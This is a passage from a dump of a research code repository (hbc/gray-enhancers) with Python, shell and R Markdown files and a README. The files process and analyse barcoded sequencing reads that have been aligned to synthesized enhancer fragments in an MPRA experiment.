d[\"clipped\"] = \"NA\"\n d[\"insertions\"] = \"NA\"\n d[\"deletions\"] = \"NA\"\n d[\"matched\"] = \"NA\"\n d[\"other\"] = \"NA\"\n return d\n for t in tuples:\n if t[0] == 4 or t[0] == 5:\n d[\"clipped\"] += t[1]\n elif t[0] == 1:\n d[\"insertions\"] += t[1]\n elif t[0] == 2:\n d[\"deletions\"] += t[1]\n elif t[0] == 0:\n d[\"matched\"] += t[1]\n else:\n d[\"other\"] += t[1]\n return d\n\ndef is_clipped(read):\n cigar = parse_cigar_tuples(read.cigar)\n if cigar[\"clipped\"] > 0:\n return True\n else:\n return False\n\ndef get_insertions(read):\n cigar = read.cigar\n insertions = []\n index = 0\n for t in cigar:\n if t[0] == 1:\n for x in range(t[1]):\n insertions.append((\"I\", index, read.seq[index]))\n index += 1\n elif t[0] == 2:\n for x in range(t[1]):\n index -= 1\n else:\n index += t[1]\n return insertions\n\ndef get_variants(read):\n variants = []\n md = partition_md(read)\n index = 0\n for x in md:\n if x.isdigit():\n index += int(x)\n elif x.startswith(\"^\"):\n deleted = x[1:]\n for c in deleted:\n variants.append((\"D\", index, c))\n index += 1\n else:\n for c in x:\n variants.append((\"M\", index, c))\n index += 1\n insertions = get_insertions(read)\n variants += insertions\n return set(variants)\n\nis_digit = lambda x: x.isdigit()\n\ndef partition_md(read):\n try:\n md = read.opt(\"MD\")\n except KeyError:\n return None\n return [\"\".join(x) for x in tz.partitionby(is_digit, md)]\n\ndef diffs(read, mate):\n read_md = partition_md(read)\n mate_md = partition_md(mate)\n\ndef reconstruct_reference(read):\n index = 0\n ref = \"\"\n seq = read.seq\n partitions = partition_md(read)\n for p in partitions:\n if p.isdigit():\n ref = ref + seq[index:index + p]\n index = index + p\n\ndef get_errors(read, mate):\n read_var = get_variants(read)\n mate_var = get_variants(mate)\n all_var = read_var.union(mate_var)\n\n synthesis = read_var.intersection(mate_var)\n sequencing = all_var.difference(synthesis)\n return {\"sequencing\": sequencing, \"synthesis\": synthesis}\n\ndef bam_to_tab(in_file):\n out_file = os.path.splitext(in_file)[0] + \".tsv\"\n # if os.path.exists(out_file):\n # return out_file\n skipped_no_cigar = 0\n pairs_processed = 0\n skipped_no_mate = 0\n skipped_mismatch_position = 0\n skipped_clipped = 0\n skipped_unmapped = 0\n skipped_secondary = 0\n skipped_read_not_matched = 0\n synthesis_dict = defaultdict(Counter)\n sequencing_dict = defaultdict(Counter)\n seen = Counter()\n\n with open_samfile(in_file) as in_file, open(out_file, \"w\") as out_handle:\n print >>out_handle, \"\\t\".join(OUT_HEADER)\n for read in in_file:\n\n try:\n ename = in_file.getrname(read.tid)\n except:\n ename = \"unmapped\"\n if read.is_secondary:\n skipped_secondary += 1\n continue\n\n barcode, number = read.qname.split(\"-\")\n fragment_id = (barcode, ename)\n mapq = int(read.mapq)\n try:\n ename = in_file.getrname(read.tid)\n species = ename.split(\"_\")[1]\n subtype = ename.split(\"_\")[2]\n eid = ename.split(\"_\")[0].replace(\"-\", \"\")\n except ValueError:\n ename = \"unmapped\"\n species = \"NA\"\n subtype = \"NA\"\n eid = \"NA\"\n try:\n mismatch = read.opt(\"NM\")\n except KeyError:\n mismatch = 0\n try:\n AS = read.opt(\"AS\")\n except KeyError:\n AS = 0\n try:\n XS = read.opt(\"XS\")\n except KeyError:\n XS = 0\n cigar = parse_cigar_tuples(read.cigar)\n clipped = cigar[\"clipped\"]\n insertions = cigar[\"insertions\"]\n deletions = cigar[\"deletions\"]\n matched = cigar[\"matched\"]\n other = cigar[\"other\"]\n seq = str(read.seq)\n out_line = map(str, [number, ename, barcode, eid, species, subtype,\n mismatch, mapq, AS, XS, clipped, insertions,\n deletions, matched, other, seq])\n out_string = \"\\t\".join(out_line)\n print >>out_handle, out_string\n print >>sys.stdout, \"Total pairs processed: %d\" % pairs_processed\n print >>sys.stdout, \"Skipped due to having no mate: %d\" % skipped_no_mate\n print >>sys.stdout, \"Skipped due to mapping to different locations: %d\" % skipped_mismatch_position\n print >>sys.stdout, \"Skipped due to clipping of read: %d\" % skipped_clipped\n print >>sys.stdout, \"Skipped due to pair not matching: %d\" % skipped_read_not_matched\n print >>sys.stdout, \"Skipped the secondary alignment: %d\" % skipped_secondary\n\nif __name__ == \"__main__\":\n parser = ArgumentParser()\n parser.add_argument(\"BAM\", help=\"BAMfile\")\n args = parser.parse_args()\n\n bam_to_tab(args.BAM)\n"
},
{
"alpha_fraction": 0.6137834191322327,
"alphanum_fraction": 0.6295358538627625,
"avg_line_length": 36.03125,
"blob_id": "79b5b17f3d267c9497b4a0c165be43aa7d2e75f7",
"content_id": "36beb97d9b0c13bd21bd6074dc7786003c3a0134",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3555,
"license_type": "no_license",
"max_line_length": 83,
"num_lines": 96,
"path": "/code/clean_read.py",
"repo_name": "hbc/gray-enhancers",
"src_encoding": "UTF-8",
"text": "import re\nimport os\nfrom argparse import ArgumentParser\nfrom Bio import SeqIO, pairwise2\n\ndef file_exists(fname):\n \"\"\"Check if a file exists and is non-empty.\n \"\"\"\n try:\n return fname and os.path.exists(fname) and os.path.getsize(fname) > 0\n except OSError:\n return False\n\ndef find_sequence_index(seq, adapter, align=True):\n \"\"\"\n if the read is missing the adapter sequence, then drop it\n \"\"\"\n # first alignment is best alignment\n if align:\n alignment = pairwise2.align.localxs(adapter, seq, -1, -0.1)[0]\n adapter_idx = start_from_alignment(alignment, len(adapter))\n else:\n adapter_idx = [m.start() for m in re.finditer(adapter, str(seq))]\n\tif adapter_idx:\n\t adapter_idx = adapter_idx[0]\n if not adapter_idx:\n return None\n return adapter_idx\n\ndef start_from_alignment(alignment, adapter_length):\n if not alignment:\n return None\n # if the alignment is poor, skip it (there is a gap or two mismatches)\n # 14 = two mismatches or 1 gap with our parameters\n if alignment[2] < (adapter_length - 2):\n return None\n return alignment[3]\n\ndef partition_read1(seq, args):\n left_adapter_idx = find_sequence_index(seq, args.left_adapter, args.align)\n right_adapter_idx = find_sequence_index(seq, args.right_adapter, args.align)\n restriction_idx = find_sequence_index(seq, args.restriction, args.align)\n if not all([left_adapter_idx, right_adapter_idx, restriction_idx]):\n return None, None\n if restriction_idx < 16:\n return None, None\n barcode = seq[restriction_idx-16:restriction_idx]\n return barcode, (left_adapter_idx, right_adapter_idx + len(args.right_adapter))\n\ndef partition_reads(args):\n fastq_file_1 = args.fastq1\n base_1, ext_1 = os.path.splitext(fastq_file_1)\n read_number = 0\n in_handle_1 = SeqIO.parse(fastq_file_1, \"fastq-sanger\")\n enhancer_fq_1 = base_1 + \".enhancer\" + ext_1\n if file_exists(enhancer_fq_1):\n return enhancer_fq_1\n\n skipped_too_short = 0\n skipped_missing_constant_seqs = 0\n kept = 0\n\n with open(enhancer_fq_1, \"w\") as fq_handle_1:\n for read in in_handle_1:\n read_number += 1\n if read_number % 100 == 0:\n print \"Processed %d reads.\" % read_number\n if len(read) < 187:\n skipped_too_short += 1\n continue\n barcode, idx = partition_read1(read.seq, args)\n if not barcode or not idx:\n skipped_missing_constant_seqs += 1\n continue\n kept += 1\n read.id = \"{barcode}-{read_number}\".format(**locals())\n fq_handle_1.write(str(read[idx[0]:idx[1]].__format__(\"fastq-sanger\")))\n\n print \"Reads proccessed: %s.\" % read_number\n print \"Reads skipped for being too short: %s.\" % skipped_too_short\n print (\"Reads skipped for not matching the anchor sequences: \"\n \"%s.\" % skipped_missing_constant_seqs)\n print \"Reads kept: %s.\" % kept\n return enhancer_fq_1\n\nif __name__ == \"__main__\":\n parser = ArgumentParser()\n parser.add_argument(\"--align\", default=False, action=\"store_true\", \n help=\"turn on local alignment (very slow)\")\n parser.add_argument(\"fastq1\", help=\"Read 1 of lane to parse.\")\n parser.add_argument(\"--left-adapter\", default=\"TGAGGAGCCGCAGTG\")\n parser.add_argument(\"--right-adapter\", default=\"CAGTGAAGCGGCCAG\")\n parser.add_argument(\"--restriction\", default=\"TCTAGAGGTACC\")\n args = parser.parse_args()\n\n partition_reads(args)\n"
},
{
"alpha_fraction": 0.5593220591545105,
"alphanum_fraction": 0.7389830350875854,
"avg_line_length": 48.16666793823242,
"blob_id": "4d709bab3bffcc90de31a6fa61db125668ad9b6e",
"content_id": "756486d851adeb9a2cdafcce8fc209ab1c0bd6c7",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Shell",
"length_bytes": 295,
"license_type": "no_license",
"max_line_length": 154,
"num_lines": 6,
"path": "/code/align.sh",
"repo_name": "hbc/gray-enhancers",
"src_encoding": "UTF-8",
"text": "#!/bin/bash\nif [ -e \"metadata/Array3_12k_2014_05_12_merged.fa.amb\" ] \n bwa index metadata/Array3_12k_2014_05_12_merged.fa\nfi\nmkdir align\nbwa bwasw metadata/Array3_12k_2014_05_12_merged.fa data/TN03_S1_L001_R1_001.enhancer.fastq | samtools view -Sbh - > align/TN03_S1_L001_R1_001.enhancer.bam\n"
},
{
"alpha_fraction": 0.723954439163208,
"alphanum_fraction": 0.7329701781272888,
"avg_line_length": 44.63428497314453,
"blob_id": "1f1cdc19a6290a91dd7249a812514fba468a3386",
"content_id": "d44df417a28ac1e4706805c29d63d46278a69a50",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "RMarkdown",
"length_bytes": 15972,
"license_type": "no_license",
"max_line_length": 414,
"num_lines": 350,
"path": "/reports/analysis_fixed.Rmd",
"repo_name": "hbc/gray-enhancers",
"src_encoding": "UTF-8",
"text": "---\n html_document:\n toc: true\n highlight: zenburn\n theme: united\n---\n\n```{r setup, echo=FALSE}\nknitr::opts_chunk$set(tidy=TRUE, highlight=TRUE, dev=\"png\",\n cache=TRUE, highlight=TRUE, autodep=TRUE, warning=FALSE, error=FALSE,\n message=FALSE, prompt=TRUE, comment='', fig.cap='')\n```\n\n## Background information\nThis project is from Jesse\nGray's lab, they are interested in looking at the composition of the enhancer sequences they had synthesized and stuck into some viral vectors; there are several subsets of enhancers, some from mouse and human and the mouse enhancers have several positive and negative controls. The enhancer sequences we barcoded with a 16mer and they are interested in looking at what the barcode distribution looks like as well.\n\nMost of the enhancer sequences are ~ 140mers in a sliding window across ~ 600 full length enhancer\nsequences. We don't have the full sequences available yet but they are floating around\nsomewhere. There are about ~ 12k enhancer fragments that were synthesized.\n\nAs a first iteration, we did something super simple to get to this\npoint, we took the enhancer fragments and made a bwa database, then\naligned the reads to those. Before aligning the reads we stuck the\nbarcode for each read in the read name, so we could figure out which\nbarcode was associated with an alignment. Then we parsed the alignment\nfile to dump which enhancer sequence it aligned to, along with the\nbarcode that was used and some numbers about mapping quality and\nnumber of mismatches along with the sequence that was sequenced. The code to do all of this,\nand this report, is up on github [here](https://github.com/hbc/gray-enhancers).\n\n```{r read-data}\nrequire(ggplot2)\nlibrary(knitr)\nlibrary(plyr)\nlibrary(dplyr)\nin_file = \"../align/TN03_S1_L001_R1_001.tsv\"\ndat = read.table(in_file, header=TRUE, sep=\"\\t\")\n# remove the reads which did not align to an enhancer\ndat = tbl_df(dat[!is.na(dat$eid),])\ndat$differences = dat$mismatch + dat$insertions + dat$deletions + dat$clipped\nsequencing_depth = dat %>% group_by(barcode, eid) %>% summarise(count=n()) %>% ungroup()\n\nnreads = nrow(dat)\nunique_barcodes = unique(dat$barcode)\nnunique_barcodes = length(unique_barcodes)\nunique_reads = unique(dat[, c(\"barcode\", \"eid\")])\n```\n\nThe original FASTQ file has about 24 million reads in it, so that is\nthe starting point. Aligning those reads to the set of enhancer\nsequences generates `r nreads` total alignments, with\n`r nrow(unique_reads)` unique barcode-enhancer pairs represented in\nthose alignments which means many of the barcode-enhancer pairs have multiple\nalignments representing them. Of the `r nrow(unique_reads)` unique\nbarcode-enhancer pairs, there are\n`r length(unique(unique_reads$barcode))` unique barcodes represented,\nso some barcodes are doing double double duty and either aligning to more\nthan one enhancer sequence or are attached to multiple enhancer\nsequences.\n\nPrevious work looking at random barcoding of sequences has shown that the barcodes with \nonly one read of evidence for them tend to be sequencing errors:\n\n\n\nIt looks like we can dump barcodes that only appear a small number of times, not just 1 and\nremove some more noise from the data.\n \n```{r depth-ber-just-barcode}\ndetach(\"package:dplyr\")\nlibrary(dplyr)\ngrouped = dat %>% group_by(barcode) %>% summarise(count=n()) %>% ungroup()\nggplot(grouped, aes(count)) + geom_histogram() + scale_x_log10() +\n theme_bw(base_size=12, base_family=\"Gill Sans\") +\n theme(panel.grid.major = element_line(size = .5, color = \"grey\"))\n```\n\nWe start with `r nrow(grouped)` unique barcodes and \nwe dump those barcodes that appear less than four times as sequencing errors in the\nbarcode.\n\n```{r dump-likely-erroneous-barcodes}\ndat = dat %>% group_by(barcode) %>% filter(n() > 4) %>% ungroup()\ngrouped = dat %>% group_by(barcode) %>% summarise(count=n())\nggplot(grouped, aes(count)) + geom_histogram() + scale_x_log10() +\n theme_bw(base_size=12, base_family=\"Gill Sans\") +\n theme(panel.grid.major = element_line(size = .5, color = \"grey\"))\n```\n\nThis leaves us with `r nrow(dat)` total alignments to work with and `r nrow(grouped)` barcodes.\nIf we further restrict and now group by eid and barcode instead of just barcode, \nwe can identify another set of\nlikely-erroneous barcode + eid combinations to remove.\nThe idea behind this is that if a barcode + eid is really present in the sample, we should\nhave sequenced more than one read for it and generate more than one alignment for that barcode.\n\n```{r depth-per-eid-and-barcode}\nlikely_erroneous = dat %>% group_by(barcode, eid) %>% summarise(count=n())\nggplot(likely_erroneous, aes(count)) + geom_histogram() + scale_x_log10() +\n theme_bw(base_size=12, base_family=\"Gill Sans\") +\n theme(panel.grid.major = element_line(size = .5, color = \"grey\"))\n```\n\n```{r depth-per-eid-and-barcode-filtered}\ndat = dat %>% group_by(barcode, eid) %>% filter(n() > 2) \nfiltered_depth = dat %>% group_by(barcode, eid) %>% summarise(count=n())\nggplot(filtered_depth, aes(count)) + geom_histogram() + scale_x_log10() +\n theme_bw(base_size=12, base_family=\"Gill Sans\") +\n theme(panel.grid.major = element_line(size = .5, color = \"grey\"))\n```\n \nThis leaves us with `r nrow(dat)` total alignments to work with and `r nrow(sequencing_depth)`\nunique barcodes + eid to work with. There are `r length(unique(dat$barcode))` unique barcodes\nand `r length(unique(dat$eid))` unique EIDs detected.\n\n\nAfter that initial cleaning, we have a table *dat* which is a set of\n`r nrow(dat)` alignments where we have removed alignments where we\nthought it was pretty likely the barcode was wrong due to a sequencing\nerror. Some of these alignments are seen repeatedly. Here we group alignments\nby barcode, eid, the number of differences, the mapping quality and the\nscore of the primary and secondary alignments to identify alignments that\nare identical.\n\n```{r identifical-alignment-counts}\ncleaned = dat[, 2:ncol(dat)] %>% group_by(barcode, eid, differences, mapq, as, xs, seq) %>%\n mutate(count = n()) %>% ungroup() %>% distinct()\nggplot(cleaned, aes(count)) + geom_histogram() + scale_x_log10() +\n theme_bw(base_size=12, base_family=\"Gill Sans\") +\n theme(panel.grid.major = element_line(size = .5, color = \"grey\"))\n```\n\nThis gets us down to `r nrow(cleaned)` distinct alignments. From the\nabove plot we can see there are many alignments that appear only a\nsmall number of times. These are again likely errors, but this time in\nthe enhancer sequence, not the barcodes.\n\nHere is an example from one barcode + eid combination:\n\n```{r example-enhancer-errors}\nx = subset(cleaned, barcode == \"TGGCTGGTGTTGTAGT\")\nx$count\nsubset(x[, c(\"barcode\", \"eid\", \"differences\", \"mismatch\", \"count\", \"as\", \"xs\")], count > 10)\n```\n\nWe can see the sequence identified by barcode \"TGGCTGGTGTTGTAGT\" likely\nhas 5 differences in the sequence to enhancer id 63406153. This is the best alignment,\nas the secondary alignment (xs) has a lower score than the primary alignment (as).\nThe other sequences we see tagged by this barcode are likely to be sequencing errors;\nthen next most common sequence we see has an extra mismatch to enhancer 63406153.\nWe have 234 reads of evidence that this sequence is present in the sample, so we can\nbe pretty sure these errors are likely synthesis errors.\n\nSo another useful filtering is to take only the barcode+eid that we have seen the most, and we\nwill call this the true sequence going forward.\n\n```{r best-set}\nclean = cleaned %>% group_by(barcode, eid, seq) %>% filter(count==max(count)) %>% ungroup()\n```\n\nNow we can break down what these look like.\n\n```{r clean-distribution}\nggplot(clean, aes(count)) + geom_histogram() + scale_x_log10() +\n theme_bw(base_size=12, base_family=\"Gill Sans\") +\n theme(panel.grid.major = element_line(size = .5, color = \"grey\"))\n```\n\nBefore we were doing one final filtering, filtering out barcode+eid sequences where the\nmost common hit had < 10 counts. We think this hurt our sensitivity though, we were missing\nsome real sequences. Here we drop that filtering to < 3 counts to try to recover more\nof the enhancer sequences.\n\n```{r final-clean}\nclean = subset(clean, count >= 3)\nggplot(clean, aes(count)) + geom_histogram() + scale_x_log10() +\n theme_bw(base_size=12, base_family=\"Gill Sans\") +\n theme(panel.grid.major = element_line(size = .5, color = \"grey\"))\nexact = subset(clean, differences == 0)\n```\n\nThat leaves us with `r nrow(clean)` barcode + enhancer sequences to consider.\nThose are represented by `r length(unique(clean$barcode))` barcodes and\n`r length(unique(clean$eid))` enhancer ids.\n\n`r nrow(exact)` of the barcode + eid sequences are exact matches\nto the enhancer sequences, representing 6884 distinct enhancer sequences.\n\n\nEach enhancer sequence is represented by multiple barcodes:\n\n```{r reads-per-eid-plot}\nreads_per_eid = clean %>% group_by(eid) %>% summarise(count=n())\nggplot(reads_per_eid, aes(count)) + geom_histogram() + scale_x_log10() +\n xlab(\"# of enhancers with this many unique barcodes\") +\n ylab(\"# of unique barcodes\") + \n theme_bw(base_size=12, base_family=\"Gill Sans\") +\n theme(panel.grid.major = element_line(size = .5, color = \"grey\"))\n```\n\nBelow is a plot in the other direction, the number of times each barcode is seen.\nMost barcodes are uniquely used and are seen only on a single enchancer one we\nremove the likely erroneous barcodes.\n\n```{r read-per-barcode-plot}\nreads_per_barcode = clean %>% group_by(barcode) %>% summarize(count=n())\nggplot(reads_per_barcode, aes(count)) + geom_histogram() + scale_x_sqrt() +\n ylab(\"# of enhancers\") + xlab(\"# of barcodes on this many different enhancers\") +\n theme_bw(base_size=12, base_family=\"Gill Sans\") +\n theme(panel.grid.major = element_line(size = .5, color = \"grey\"))\n```\n\nSome enhancers had better mapping quality than others. It looks like it separates out\nby subtype.\n\n```{r mapq-plot}\nggplot(clean, aes(subtype, mapq)) + geom_boxplot() +\n theme_bw(base_size=12, base_family=\"Gill Sans\") + xlab(\"\") +\n theme(panel.grid.major = element_line(size = .5, color = \"grey\"))\n```\n\nSimilarly, there is less of a spread of the differences to the best hit,\nthough the sliding and endongenous subtypes seem to have and enrichment for\na low number of mismatches.\n\n```{r mismatch-plot}\nggplot(clean, aes(subtype, differences)) + geom_violin() +\n theme_bw(base_size=12, base_family=\"Gill Sans\") + scale_y_sqrt() +\n theme(panel.grid.major = element_line(size = .5, color = \"grey\"))\n```\nIn general, mapping quality decreases with the number of differences with the enhancer sequence, but there is a range at each value.\n\n```{r mismatch-vs-mapq-plot}\nggplot(clean, aes(differences, mapq)) + geom_point() + facet_wrap(~ subtype) +\n xlab(\"# of mismatches\") +\n ylab(\"mapping quality\") +\n theme_bw(base_size=12, base_family=\"Gill Sans\") +\n theme(panel.grid.major = element_line(size = .5, color = \"grey\"),\n axis.ticks = element_blank(), axis.text.x = element_blank())\n```\n\n```{r as-vs-xs}\nggplot(clean, aes(as, xs)) + geom_point() + facet_wrap(~ subtype) +\n xlab(\"score of best alignment\") +\n ylab(\"score of second best alignment\") +\n theme_bw(base_size=12, base_family=\"Gill Sans\") +\n theme(panel.grid.major = element_line(size = .5, color = \"grey\"),\n axis.ticks = element_blank(), axis.text.x = element_blank())\n```\n\nSome enhancer sequences don't have a best hit. Here are the enhancer sequences that are missing:\n\n```{r missing-enhancers, results='asis'}\nenhancer_fn = \"../metadata/enhancer.tsv\"\nenhancers = read.table(enhancer_fn, header=TRUE, stringsAsFactors=FALSE)\nenhancers$seen = enhancers$eid %in% clean$eid\nnmissing = nrow(subset(enhancers, !seen))\nnseen = nrow(subset(enhancers, seen))\nout_table = data.frame(table(enhancers$seen))\ncolnames(out_table) = c(\"seen\", \"count\")\nkable(out_table, format=\"markdown\")\n```\n\nOut of `r nrow(enhancers)` there are `r nmissing` missing and `r nseen` seen\nenhancers. Here is a breakdown by type:\n\n```{r enhancer-table, results='asis'}\nout_table = data.frame(table(enhancers[, c(\"subtype\", \"seen\", \"species\")]))\ncolnames(out_table) = c(\"subtype\", \"seen\", \"species\", \"count\")\nkable(out_table, format=\"markdown\")\nwrite.table(subset(enhancers, !seen), file=\"missing_enhancers.csv\", quote=FALSE, sep=\",\",\n col.names=TRUE, row.names=FALSE)\n```\n\nFinally we write out the cleaned data to a big table. This table has for each\nbarcode and enhancer sequence the number of mismatches, indels, etc for the alignment\nto the specified enhancer sequence. The alignment is the best hit for the sequence and\nthe mismatches are likely synthesis errors, because we saw them in at least 3 separate\nidentical reads. The consensus sequence that generated the best hit is in the seq\ncolumn of the table.\n\n```{r write-clean}\nwrite.table(clean, file=\"clean.csv\", quote=FALSE, sep=\",\", col.names=TRUE, row.names=FALSE)\n```\n\n## How did we do recovering the highly expressed barcodes?\nThese are cDNA counts from two replicates of two conditions, sequencing from plasmid\nDNA. I'm not too clear on where this data came from; is it a similar type of experiment? \n\n```{r read-bc-data}\nbc_file = \"../metadata/TN03/TN03_MiSeq_tallies_raw_bcs.tsv\"\ncdna_bc = read.table(bc_file, sep=\"\\t\", header=TRUE)\nrownames(cdna_bc) = cdna_bc$bc\nrownames(cdna_bc) = as.factor(rownames(cdna_bc))\ncdna_bc$bc = NULL\n```\n\nThis has `r nrow(cdna_bc)` barcodes, we are only picking up about 210k barcodes so we\nare only getting about half of the data. A bunch of these barcodes have very low counts,\nonly appearing a small number of times in some conditions.\n\n```{r bc-data-plot}\nqplot(rowSums(cdna_bc)) + geom_histogram() +\n theme_bw(base_size=12, base_family=\"Gill Sans\") + scale_x_log10() + \n theme(panel.grid.major = element_line(size = .5, color = \"grey\"))\n```\n\nThese might be errors, we can do something similar as we did above and drop barcodes that\nappear < 3 times.\n\n```{r subset-cdna-barcodes}\ncdna_bc = subset(cdna_bc, rowSums(cdna_bc) >=3)\nhigh_bc = subset(cdna_bc, rowSums(cdna_bc) >=100)\n```\n\nThat leaves us with `r nrow(cdna_bc)` and puts us closer to the `r nrow(clean)`\nbarcodes we recover from this experiment. In the original, non-cleaned dataset we\nare missing `r nrow(cdna_bc) - sum(rownames(cdna_bc) %in% dat$barcode)` out of\n`r nrow(cdna_bc)` barcodes.\nIf we restruct this to barcodes with total counts > 100 then we \nare missing `r nrow(high_bc) - sum(rownames(high_bc) %in% dat$barcode)` out of `r nrow(high_bc)`\nbarcodes. k\n\nWhy are we missing these still? It depends on the barcode. For example TTTGCGTTCGTGCGTT is missing,\nbut only appears a small number of times in the reads, and most of the time it is a very short sequence. Only one read was long enough to have a real enhancer sequence in it.\n\nbarcode AAAACTATCGTTTGAG is highly expessed in the cDNA data and has many reads with that\nsequence in it. It has a lot of reads that all match the barcode and both of the adapter sequences match. The enhancer sequence looks fine:\n\nGAGCCGTGGACTTCGGCGAAGCGACCACAACAACAACGGAGGCGGCGGCGGCAGCGACGACTACTCCACAGGCGGGACTTCCGGCTGCCGGAGCCTAGCAACCTCCCGGGGCGGGGCTTCCGGCGGGCCTGGTAAGAG\n\nThis barcode appears many times in the original TSV file:\n\n```{r missing-barcode}\nsubset(dat, barcode == \"AAAACTATCGTTTGAG\")\n```\n\nSo what is the deal, why are we missing it?\n\nThe enhancer sequence doesn't have a full length match to any\nparticular sequence. The GC content is high, 70%. There is a lot of\nsequencing errors in this enhancer sequence and there are only 32\nreads, and it just happens that none of them are repeated more than\ntwice, even though we know what enhancer the sequence is for, we don't have enough\nevidence to call the actual sequence that way we are doing it.\n\nTo rescue these types of reads, we'd have to do something like call a consensus sequence and\nthen realign. But since we are missing 4,000 barcodes right from the start, this would at most\nfix the 1.5k or so that are filtered out by the cleaning process.\n"
},
{
"alpha_fraction": 0.5625,
"alphanum_fraction": 0.75,
"avg_line_length": 15,
"blob_id": "07ca168d7f161969e805d7b0eedce0c19e689a98",
"content_id": "1d155db89fba1f208e71f83cff8541ec560d2a20",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Text",
"length_bytes": 16,
"license_type": "no_license",
"max_line_length": 15,
"num_lines": 1,
"path": "/requirements.txt",
"repo_name": "hbc/gray-enhancers",
"src_encoding": "UTF-8",
"text": "biopython>=1.61\n"
},
{
"alpha_fraction": 0.7654458284378052,
"alphanum_fraction": 0.7787643074989319,
"avg_line_length": 38.173912048339844,
"blob_id": "e8f2e975f4eaaaf5c0b015407d74ec238fd575a7",
"content_id": "794f6ec270da61f98e73346c364d166485a60df4",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 2703,
"license_type": "no_license",
"max_line_length": 114,
"num_lines": 69,
"path": "/README.md",
"repo_name": "hbc/gray-enhancers",
"src_encoding": "UTF-8",
"text": "## assign barcodes to enhancers\nThese are the scripts to look at enhancer + barcode statistics from the MPRA\nexperiment.\n\nThese scripts take the tiled enhancer sequences and creates a BWA index of the\ntiles. Then they align the barcoded reads to the tiled sequences and determine\nwhich barcode corresponds to which tile by determining which tile the barcode\naligns best to. Barcodes can have errors, so these scripts also do some\nsimple disabiguation of erroneous barcodes. They also drop barcodes that are\nambiguous.\n\nThe clean_read.py part of these scripts is highly dependent on the structure of\nyour data. What this does is remove barcode and some other static sequences from\nthe read, and places the barcode in the read name. This is so after alignment,\nwe can figure out what barcode went with the sequence. If you can provide FASTQ\nfiles that have the barcode in the read name you can skip this step and run the\nrest of the analysis.\n\nYour reads should have the format `barcode-name` as the read name if you want\nto skip the cleaning step.\n\n## cleaning\nRaw reads are expected to have the format:\n```\n-11mer barcode +\n-12mer constant restriction site (TCTAGAGGTACC) +\n-88bp enhancer +\n-33bp constant seq (CAGTGAAGCGGCCAGTGATCGGAAGAGCACAC ) +\n-6bp Truseq index (GTCTGA or CGATGT) +\n-41bp P7 sequence (ACTCCAGTCACATCACGATCTCGTATGCCGTCTTCTGCTT)\n```\n\nBut if you can provide reads with names `barcode-name` you can skip this\nstep.\n\n\n## How to run\n1) Create a FASTA file of the enhancer sequences, enhancers.fa. The names of the\n sequences should not have any spaces in them.\n2) index the sequence with bwa: bwa index enhancers.fa\n3) stick barcode in the read name with: python ../code/clean_read.py sequences.fq\n3) align sequences with bwa mem: bwa mem -t number-of-threads enhancers.fa sequences.enhancers.fq > alignments.sam\n4) create a table of the barcode and best enhancer sequence alignment from the BAM file:\npython bam_to_table.py alignments.sam\n5) load into analysis_fixed.Rmd\n\n## example analysis\n```bash\ninfile=data/TN05_S1_L001_R1_001.fastq\ncleaned=data/TN05_S1.cleaned.fastq\nprefix=TN05\nout_dir=new-data\nenhancers=metadata/TN03_newstrategy_trimmed.fa\n\nmkdir -p out-dir\npython ../code/clean_read.py $infile > $cleaned\nbwa mem -t 6 $enhancers $cleaned > $out_dir/$prefix.sam\npython ../code/bam_to_table.py $out_dir/$prefix.sam\n```\n\nYou can use this table to do a more in depth analysis.\nThe file analysis_fixed.Rmd has an example,\n\nthen run analysis_fixed.Rmd on the file in $out_dir/$prefix.tsv file.\n\n## help\nIf you'd like to use this idea to do a similar experiment and these aren't\nworking for you post an issue and we'll work with you to get something\nthat will work with your data.\n"
},
{
"alpha_fraction": 0.5230224132537842,
"alphanum_fraction": 0.5289255976676941,
"avg_line_length": 34.29166793823242,
"blob_id": "67437622dce63d437f7b29ba3101e37e51277e00",
"content_id": "da69a38f8eccd131771f764dc00c87ac363c3971",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 847,
"license_type": "no_license",
"max_line_length": 83,
"num_lines": 24,
"path": "/code/metadata_to_table.py",
"repo_name": "hbc/gray-enhancers",
"src_encoding": "UTF-8",
"text": "from argparse import ArgumentParser\n\n\nif __name__ == \"__main__\":\n parser = ArgumentParser()\n parser.add_argument(\"--trim\", help=\"bases to trim from front and back of read\",\n default=16)\n parser.add_argument(\"fasta\", help=\"FASTA file of enhancer sequences\")\n args = parser.parse_args()\n\n header = [\"eid\", \"species\", \"subtype\", \"sequence\"]\n print \"\\t\".join(header)\n\n with open(args.fasta) as in_handle:\n for line in in_handle:\n if line.startswith(\">\"):\n ename = line.replace(\">\", \"\")\n species = ename.split(\"_\")[1]\n subtype = ename.split(\"_\")[2]\n eid = ename.split(\"_\")[0].replace(\"-\", \"\")\n continue\n\n seq = line[args.trim:-args.trim].lower()\n print \"\\t\".join([eid, species, subtype, seq])\n"
},
{
"alpha_fraction": 0.6935513615608215,
"alphanum_fraction": 0.7043909430503845,
"avg_line_length": 37.06293869018555,
"blob_id": "c0f946d54d4ab6d60220938248a67e2e1de9c34a",
"content_id": "96de936f77c24a5cec5cb421545ed62464aa67eb",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "RMarkdown",
"length_bytes": 5443,
"license_type": "no_license",
"max_line_length": 129,
"num_lines": 143,
"path": "/reports/TN05-analysis.Rmd",
"repo_name": "hbc/gray-enhancers",
"src_encoding": "UTF-8",
